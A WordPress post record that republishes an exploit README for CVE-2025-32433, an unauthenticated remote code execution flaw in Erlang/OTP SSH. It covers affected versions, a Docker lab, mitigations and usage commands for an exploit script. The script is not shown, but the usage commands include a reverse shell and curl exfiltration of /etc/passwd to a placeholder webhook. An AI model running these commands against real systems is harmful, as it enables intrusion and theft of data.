{"id":751,"date":"2025-04-20T10:35:44","date_gmt":"2025-04-20T10:35:44","guid":{"rendered":"http:\/\/localhost\/?p=751"},"modified":"2025-04-20T10:35:44","modified_gmt":"2025-04-20T10:35:44","slug":"exploit-for-cve-2025-32433","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=751","title":{"rendered":"Exploit for CVE-2025-32433"},"content":{"rendered":"<div class=\"vulnerability-details\">\n<h2>Vulnerability Details<\/h2>\n<div class=\"info-section\">\n<h3>Basic Information<\/h3>\n<table class=\"info-table\">\n<tr>\n<th>Title<\/th>\n<td>Exploit for CVE-2025-32433<\/td>\n<\/tr>\n<tr>\n<th>Type<\/th>\n<td>githubexploit<\/td>\n<\/tr>\n<tr>\n<th>Published<\/th>\n<td>2025-04-19T21:37:47<\/td>\n<\/tr>\n<tr>\n<th>Last Seen<\/th>\n<td>2025-04-20T15:04:23<\/td>\n<\/tr>\n<tr>\n<th>CVSS Score<\/th>\n<td style=\"color: #cc0000; font-weight: bold;\">10.0 (CRITICAL)<\/td>\n<\/tr>\n<\/table><\/div>\n<div class=\"cvss-section\">\n<h3>CVSS v3 Details<\/h3>\n<table class=\"cvss-table\">\n<tr>\n<th>Attack Vector<\/th>\n<td>NETWORK<\/td>\n<\/tr>\n<tr>\n<th>Attack Complexity<\/th>\n<td>LOW<\/td>\n<\/tr>\n<tr>\n<th>Privileges Required<\/th>\n<td>NONE<\/td>\n<\/tr>\n<tr>\n<th>User Interaction<\/th>\n<td>NONE<\/td>\n<\/tr>\n<tr>\n<th>Scope<\/th>\n<td>CHANGED<\/td>\n<\/tr>\n<tr>\n<th>Confidentiality Impact<\/th>\n<td>HIGH<\/td>\n<\/tr>\n<tr>\n<th>Integrity Impact<\/th>\n<td>HIGH<\/td>\n<\/tr>\n<tr>\n<th>Availability Impact<\/th>\n<td>HIGH<\/td>\n<\/tr>\n<\/table><\/div>\n<div class=\"cve-section\">\n<h3>CVE Information<\/h3>\n<table class=\"cve-table\">\n<tr>\n<th>CVE IDs<\/th>\n<td>CVE-2025-32433<\/td>\n<\/tr>\n<tr>\n<th>CWE<\/th>\n<td><\/td>\n<\/tr>\n<tr>\n<th>Bulletin Family<\/th>\n<td>exploit<\/td>\n<\/tr>\n<\/table><\/div>\n<div class=\"description-section\">\n<h3>Description<\/h3>\n<div class=\"description-content\">\n            # CVE-2025-32433 &#8211; Critical Erlang\/OTP SSH Vulnerability<\/p>\n<p>![SSH ERLANG EXPLOIT](image.png)<\/p>\n<p>## Overview \ud83d\udd0d<\/p>\n<p>CVE-2025-32433 is a critical vulnerability discovered in Erlang\/OTP&#8217;s SSH implementation that allows **unauthenticated remote code execution** via specially crafted SSH messages. This severe security flaw enables attackers to execute arbitrary code on affected systems without authentication.<\/p>\n<p>* **What**: Remote Code Execution (RCE) via unauthenticated SSH messages in Erlang\/OTP<br \/>\n* **Impact**: Full code execution, potentially as root, over the network<br \/>\n* **Affected**: Any system running an Erlang\/OTP-based SSH server<br \/>\n* **Fix**: Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`<br \/>\n* **Workaround**: Restrict SSH access using firewall rules<\/p>\n<p>## Vulnerability Details \u26a0\ufe0f<\/p>\n<p>Discovered by researchers at Ruhr University Bochum, this vulnerability stems from improper handling of SSH connection protocol messages in Erlang\/OTP. It allows attackers to send maliciously crafted messages before authentication is completed, resulting in unauthenticated arbitrary code execution.<\/p>\n<p>If the Erlang SSH daemon is running as root (a common configuration), successful exploitation grants full system control, making it a prime candidate for ransomware deployment, lateral movement through networks, or data exfiltration.<\/p>\n<p>## Affected Versions \ud83d\udc1b<\/p>\n<p>* <= OTP-27.3.2\n* <= OTP-26.2.5.10\n* <= OTP-25.3.2.19\n\n## Lab Setup \ud83d\udda5\ufe0f\n\nFollow these steps to set up a test environment:\n\n1. **Install Docker and Docker Compose**\n   ```bash\n   sudo apt update\n   sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release\n   curl -fsSL https:\/\/download.docker.com\/linux\/ubuntu\/gpg | sudo apt-key add -\n   sudo add-apt-repository \"deb [arch=amd64] https:\/\/download.docker.com\/linux\/ubuntu $(lsb_release -cs) stable\"\n   sudo apt install docker-ce docker-ce-cli containerd.io\n   sudo docker --version\n   sudo curl -L \"https:\/\/github.com\/docker\/compose\/releases\/download\/v2.29.1\/docker-compose-$(uname -s)-$(uname -m)\" -o \/usr\/local\/bin\/docker-compose\n   sudo chmod +x \/usr\/local\/bin\/docker-compose\n   docker-compose --version\n   ```\n\n2. **Build and Run the Vulnerable Container**\n   ```bash\n   docker build -t erlang-ssh .\n   docker run -d --name erlang-ssh-container -p 2222:2222 -v \/home\/local.txt:\/home erlang-ssh\n   ```\n3. **Set Up as a Service**\n\n      To run the container as a service that starts automatically:\n      \n      a. Create a systemd service file:\n      ```bash\n      sudo nano \/etc\/systemd\/system\/erlang-ssh-vuln.service\n      ```\n      b. Add the following content:\n      ```bash\n      [Unit]\n      Description=Erlang SSH Vulnerability Lab\n      After=docker.service\n      Requires=docker.service\n      \n      [Service]\n      TimeoutStartSec=0\n      Restart=always\n      ExecStartPre=-\/usr\/bin\/docker stop erlang-ssh-container\n      ExecStartPre=-\/usr\/bin\/docker rm erlang-ssh-container\n      ExecStart=\/usr\/bin\/docker run --name erlang-ssh-container -p 2222:2222 -v \/home\/local.txt:\/home erlang-ssh\n      ExecStop=\/usr\/bin\/docker stop erlang-ssh-container\n      \n      [Install]\n      WantedBy=multi-user.target\n      ```\n      \n      c. Enable and start the service:\n      ```bash\n      sudo systemctl daemon-reload\n      sudo systemctl enable erlang-ssh-vuln.service\n      sudo systemctl start erlang-ssh-vuln.service\n      ```\n\n\n## Exploit Usage \ud83d\ude80\n\nThe exploit script provides several options for testing and exploiting the vulnerability:\n\n### Basic Syntax:\n```bash\npython exploit.py <host> [options]<br \/>\n&#8220;`<\/p>\n<p>### Check Vulnerability:<br \/>\n&#8220;`bash<br \/>\npython exploit.py 172.32.33.28 -p 2222 &#8211;check<br \/>\n&#8220;`<\/p>\n<p>### Execute Command:<br \/>\n&#8220;`bash<br \/>\npython exploit.py 172.32.33.28 -p 2222 -c &#8216;ls -la&#8217;<br \/>\n&#8220;`<\/p>\n<p>### Get Reverse Shell:<br \/>\n&#8220;`bash<br \/>\npython exploit.py 172.32.33.28 -p 2222 &#8211;shell &#8211;lhost 172.32.36.48 &#8211;lport 4444<br \/>\n&#8220;`<\/p>\n<p>### Alternative Data Exfiltration:<br \/>\nIf direct commands don&#8217;t work, you can use webhook-based exfiltration:<br \/>\n&#8220;`bash<br \/>\npython exploit.py 172.32.33.28 -p 2222 -c &#8220;curl -X POST -d @\/etc\/passwd WEBHOOKURL&#8221;<br \/>\n&#8220;`<br \/>\n&#8220;`bash<br \/>\npython exploit.py 172.32.33.28 -p 2222 -c &#8220;curl -X POST -d @\/home\/local.txt WEBHOOKURL&#8221;<br \/>\n&#8220;`<\/p>\n<p>## Mitigation Steps \ud83d\udee1\ufe0f<\/p>\n<p>1. **Update Erlang\/OTP**:<br \/>\n   &#8211; Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`<br \/>\n   &#8211; These patched versions properly validate SSH protocol messages<\/p>\n<p>2. **Network Controls**:<br \/>\n   &#8211; Restrict access to SSH services with firewall rules<br \/>\n   &#8211; Implement network segmentation to isolate critical systems<\/p>\n<p>3. **Monitoring**:<br \/>\n   &#8211; Deploy intrusion detection\/prevention systems to monitor for exploitation attempts<br \/>\n   &#8211; Enable enhanced logging for SSH connections<\/p><\/div>\n<\/p><\/div>\n<div class=\"impact-section\">\n<h3>Impact Assessment<\/h3>\n<table class=\"impact-table\">\n<tr>\n<th>Base Score<\/th>\n<td>10.0<\/td>\n<\/tr>\n<tr>\n<th>Severity<\/th>\n<td style=\"color: #cc0000;\">CRITICAL<\/td>\n<\/tr>\n<\/table><\/div>\n<div class=\"source-link\">\n<p><a href=\"https:\/\/github.com\/SDX442\/CVE-2025-32433\" target=\"_blank\">View full CVE details<\/a><\/p>\n<\/p><\/div>\n<\/div>\n<style>\n.vulnerability-details {\n    font-family: Arial, sans-serif;\n    max-width: 1200px;\n    margin: 0 auto;\n    padding: 20px;\n}<\/p>\n<p>.info-section, .cvss-section, .cve-section, .description-section, .impact-section {\n    margin-bottom: 30px;\n    background: #f8f9fa;\n    padding: 20px;\n    border-radius: 8px;\n    box-shadow: 0 2px 4px rgba(0,0,0,0.1);\n}<\/p>\n<p>h2 {\n    color: #2c3e50;\n    border-bottom: 2px solid #3498db;\n    padding-bottom: 10px;\n    margin-bottom: 20px;\n}<\/p>\n<p>h3 {\n    color: #34495e;\n    margin-bottom: 15px;\n}<\/p>\n<p>.info-table, .cvss-table, .cve-table, .impact-table {\n    width: 100%;\n    border-collapse: collapse;\n    margin-bottom: 20px;\n}<\/p>\n<p>.info-table th, .cvss-table th, .cve-table th, .impact-table th {\n    background: #e9ecef;\n    padding: 12px;\n    text-align: left;\n    width: 200px;\n}<\/p>\n<p>.info-table td, .cvss-table td, .cve-table td, .impact-table td {\n    padding: 12px;\n    border-bottom: 1px solid #dee2e6;\n}<\/p>\n<p>.description-content {\n    line-height: 1.6;\n    color: #2c3e50;\n}<\/p>\n<p>.source-link {\n    text-align: center;\n    margin-top: 30px;\n}<\/p>\n<p>.source-link a {\n    display: inline-block;\n    padding: 10px 20px;\n    background: #3498db;\n    color: white;\n    text-decoration: none;\n    border-radius: 5px;\n    transition: background 0.3s;\n}<\/p>\n<p>.source-link a:hover {\n    background: #2980b9;\n}\n<\/style>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Details Basic Information Title Exploit for CVE-2025-32433 Type githubexploit Published 2025-04-19T21:37:47 Last Seen 2025-04-20T15:04:23 CVSS Score 10.0 (CRITICAL) CVSS v3 Details Attack Vector NETWORK&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[9,6,8,36,12,32,13,7,11,5],"class_list":["post-751","post","type-post","status-publish","format-standard","hentry","category-category_cve","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-githubexploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploit for CVE-2025-32433 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=751\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploit for CVE-2025-32433 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Vulnerability Details Basic Information Title Exploit for CVE-2025-32433 Type githubexploit Published 2025-04-19T21:37:47 Last Seen 2025-04-20T15:04:23 CVSS Score 10.0 (CRITICAL) CVSS v3 Details Attack Vector NETWORK...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=751\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-20T10:35:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Exploit for CVE-2025-32433\",\"datePublished\":\"2025-04-20T10:35:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751\"},\"wordCount\":238,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"githubexploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_cve\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=751#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751\",\"name\":\"Exploit for CVE-2025-32433 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-20T10:35:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=751\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=751#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploit for CVE-2025-32433\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploit for CVE-2025-32433 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=751","og_locale":"en_US","og_type":"article","og_title":"Exploit for CVE-2025-32433 - zero redgem","og_description":"Vulnerability Details Basic Information Title Exploit for CVE-2025-32433 Type githubexploit Published 2025-04-19T21:37:47 Last Seen 2025-04-20T15:04:23 CVSS Score 10.0 (CRITICAL) CVSS v3 Details Attack Vector NETWORK...","og_url":"https:\/\/zero.redgem.net\/?p=751","og_site_name":"zero redgem","article_published_time":"2025-04-20T10:35:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=751#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=751"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Exploit for CVE-2025-32433","datePublished":"2025-04-20T10:35:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=751"},"wordCount":238,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","githubexploit","news","Security","tapic","Vulnerability"],"articleSection":["category_cve"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=751#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=751","url":"https:\/\/zero.redgem.net\/?p=751","name":"Exploit for CVE-2025-32433 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-20T10:35:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=751#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=751"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=751#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Exploit for CVE-2025-32433"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=751"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/751\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}